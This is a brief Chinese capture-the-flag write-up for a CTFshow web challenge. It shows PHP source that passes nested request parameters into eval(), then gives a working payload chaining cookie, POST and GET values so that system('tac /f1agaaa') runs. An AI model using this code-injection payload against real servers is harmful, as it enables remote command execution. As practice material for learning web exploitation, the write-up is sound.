题目来源
CTFshow
考点
参数传递的获取、url编码、eval命令执行
源码
<?php
error_reporting(0);
highlight_file(__FILE__);
eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
解题思路
先是cookie传参
再是POST传参
再是GET传参
再是REQUEST传参
最后是eval命令执行
Payload
分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016
构造payload
?b=c&c[6][0][7][5][8][0][9][4][4]=system("tac /f1agaaa");
a=b
CTFshow-QQ%E7%BE%A4:=a
文章来源:https://www.toymoban.com/news/detail-701208.html
得到flag文章来源地址https://www.toymoban.com/news/detail-701208.html
到了这里,关于CTFshow-菜狗杯-web签到的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!